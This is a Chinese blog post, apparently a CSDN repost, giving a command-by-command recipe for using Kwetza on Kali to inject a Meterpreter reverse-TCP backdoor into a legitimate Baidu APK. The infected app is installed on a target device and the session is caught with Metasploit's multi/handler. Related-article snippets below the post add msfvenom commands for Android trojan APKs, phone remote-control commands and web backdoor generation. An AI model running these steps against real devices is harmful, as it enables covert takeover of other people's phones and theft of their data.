kali下Kwetza进行安卓APK文件恶意注入

最新推荐文章于 2023-12-19 17:14:45 发布
最新推荐文章于 2023-12-19 17:14:45 发布
阅读量789 收藏 5
点赞数
文章标签: git
原文链接:https://yq.aliyun.com/articles/628536
版权
版权声明:转载请注明出处:http://blog.csdn.net/dajitui2024 https://blog.csdn.net/dajitui2024/article/details/79396584

参考:https://www.youtube.com/watch?v=sP8CtMPAwzY
https://sensepost.com/blog/2016/kwetza-infecting-android-applications/

cd /tmp
git clone https://github.com/sensepost/kwetza
cd kwetza
python kwetza.py baidu.apk 监听者IP 监听端口 yes
#这里选取了百度的apk文件做测试
随便输入一个密码
得到新生成的apk文件
将注入完成的apk文件安装在目标设备
也可以本机
xdg-open baidu.apk

msfconsole
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 监听者IP
set lport 监听端口
exploit
weixin_34358365
关注
kali linux逆向apk,Kali Linux 逆向工程工具 d2j-dex2ja 教程
weixin_34638021的博客
05-26 1739
日期:2017年12月20日观看: 1,309 °C 次d2j-dex2jar是一款针对安卓,将dex转换为jar的工具。什么是dex文件?dex文件是Android平台上可执行文件的类型。对于Android DEX文件进行优化,需要注意的一点是DEX文件的结构是紧凑的,但是我们还是要想方设法的进行提高程序的运行速度,我们就仍然需要对DEX文件进行进一步优化。调整所有字段的字节序(LITTLE_...
Kali利用MSF渗透安卓手机_kali入侵安卓手机(1)
2401_84519960的博客
05-01 1012
由于文章篇幅原因,我只把面试题列了出来,详细的答案,我整理成了一份PDF文档,这份文档还包括了还有高级架构技术进阶脑图、Android开发面试专题资料,高级进阶架构资料 ,帮助大家学习提升进阶,也节省大家在网上搜索资料的时间来学习。网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。需要这份系统化学习资料的朋友,可以戳这里获取一个人可以走的很快,但一群人才能走的更远!
APK代码注入
04-02
APK代码注入,可以在已经完整的apk注入自己的代码
Kali入侵Android系统
2301_77994635的博客
11-17 1282
三、将test.apk上传至攻击目标并启动。test.apk 生成的可执行木马文件名。1.选择multi/handler模块。3.设置lhost和lport(同上)2.设置payload(和上面一样)app_list 查看安装的app。ipconfig 查看网络配置信息。成功msf成功建立session。sysinfo 系统信息。lhost 本机ip。lport 监听端口。四、窥探目标环境信息。
JVM 类加载器与双亲委派模型
Doub1's Blog
08-31 242
JVM 类加载器与双亲委派机制类加载器类加载器的作用.class 文件结构类加载器的命名空间双亲委派机制 类加载器 Java类加载器(英语:Java Classloader)是Java运行时环境(Java Runtime Environment)的一部分,负责动态加载Java类到Java虚拟机的内存空间中。类通常是按需加载,即第一次使用该类时才加载。由于有了类加载器,Java运行时系统不需要知道文件文件系统。学习类加载器时,掌握Java的委派概念很重要。 每个Java类必须由某个类加载器装入到内存。Ja
安卓后门手动注入
钻石
02-18 5669
#首先申明:随意修改别人软件是违法行为,本文只用于学术研究,不得用于非法用途,后果自负,与本人无关      前面讲过kali如何生成apk木马渗透安卓,有个问题就是生成的软件无正常功能,且没有图标、单机没有任何反应,别人一看就知道是木马,当然也可以修改apk图标,我上次修改成qq图标了,思路是:先用Androidkiller反编译得到源代码,然后将源代码导入eclipse(或其他编程软件)重...
kali for android让你的安卓设备跑起kali.docx
08-20
"Kali for Android 让你的安卓设备跑起 Kali" Kali for Android 是一种将 Kali 系统安装到安卓设备上的解决方案,将安卓设备变成渗透测试小钢炮。以下是实现 Kali for Android 的详细步骤和知识点: 一、前提条件 ...
kali linux 下sqlmap注入ACCESS数据库.doc
03-04
Kali Linux 下 SQLmap 注入 ACCESS 数据库 Kali Linux 作为一个基于 Debian 的 Linux 发行版,广泛应用于渗透测试和安全评估中,而 SQLmap 则是一个开源的自动化 SQL 注入工具,旨在检测和利用 SQL 注入漏洞。下面...
Kali 下对安卓手机的攻击
m0_66524548的博客
01-29 1万+
写在前面:本文仅限学术交流,请勿用他人实践 Kali安卓手机的攻击(渗透) 我们首先需要确定本机IP 这很简单,对于Kali来说我们需要打开终端并键入 ifconfig 即可获取自己的IP,然后我们需要确定安卓手机也就是被攻击者的IP,只需键入 fping -g 本机IP地址/24 这时我们就能确定目标IP,这次教程主要围绕创建后门程序展开 在终端中执行: # msfvenom -p android/meterpreter/reverse_tcp LHOST=目标IP LPORT=
Kali Linux 如何破解 Android 手机
Android 开发架构
06-16 3064
出现meterpreter提示:
kali下生成web端后门
weixin_34397291的博客
12-07 815
  很多时候在***测试时选择web***害怕用的别人的马带有后门,这样自己的辛苦就要被别人不劳而获,很多时候我们都想拥有自己的马,那么这个时候你就应该使用kail来生成一个自己独特密码的web***了。 Kali Linux自带有好几个web***生成工具,下面我们来简单看几个:1.webacoo后门webacoo  -g -o test.php-g 制作后门代码-o 输出生成指定的后门程序文件...
Android逆向工程之反编译注入代码
Lem的博客
10-08 3715
反编译植入代码。      其实思路很简单:     1、首先我们要反编译targetapk.apk,得到源代码对应字节码。我们知道,如果我们要植入代码到其中,必须加入字节码然后重新编译打包。     2、怎么写字节码?其实我们只要新建一个Android工程,将我们需要加入的Android代码写入,然后打包成apk,比如sourceapk.apk;接着反编译它得到Android代码对应的字节
kali之veil-evasion免杀安装找不到wine32包-亲测解决方案
跃祥博客
12-27 2886
该软件需要wine32包,一般在64位kali里是只有wine64包 所以需要更新架构 dpkg --add-architecture i386 apt-get update 之后就可以安装veil时就可以安装wine32了。 安装veil-evasion: apt-get install veil-evasion ...
kali-捆绑应用程序
乌托托的博客
12-19 672
kali捆绑应用程序
Kali Linux渗透测试基础入门到进阶实战全程课
09-29
课程标题:Kali Linux渗透测试基础入门到进阶实战全程课一、课程声明       本课程所有分享仅做学习交流,切勿用于任何不法用途,请每位学员自觉遵守网络安全法等法律法规!二、课程概要       本课程主要分享Kali Linux渗透测试基础入门到进阶实战全程技巧!三、适合人员       1、零基础大学生       2、IT技术人员       3、运维工程师       4、渗透测试工程师       5、漏洞挖掘工程师四、特别说明       1、本课程支持一次购买,永久观看!       2、本课系讲师原创课程,请勿盗用!
Kali Linux渗透测试实战:Msfvenom木马生成与攻防实战教程
08-19
1、课程概要       本课程主要分享Kali Linux渗透测试实战:Msfvenom生成木马攻防实战教程! 2、课程目标         本课程致力于帮助广大学员掌握Msfvenom木马生成与攻防实战技巧! 3、适合人员        本课程适合兴趣计算机与网络安全技术的学员观看学习! 4、特别说明        本课程支持一次购买,永久观看,请广大学员们放心选购!
kali安卓手机木马远控
热门推荐
m0_65606241的博客
05-06 1万+
得到kali本机IP,设置端口 利用msf payload模块生成木马 命令:msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.174.129 lport=5555 R > 1.apk 木马生成后 开启我们的监听模块msfconsole 进入控制端后,设置一个安卓的playload(之前使用过的) 设置监听kali虚拟机的ip地址和端口号(与之前生成apk木马文件的命令参数相同) run启用,等待木马..
kali做一个安卓apk文件,使得手机打开文件时,能自动向文件里面指定好的群联中发送文件中自定义的消息
最新发布
09-13
要在Kali Linux上创建一个能自动在手机打开时发送特定消息的Android APK文件,你需要遵循几个步骤: 1. **选择开发环境**:安装Android Studio或类似IDE,例如Eclipse或IntelliJ IDEA,它们支持Android应用程序的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值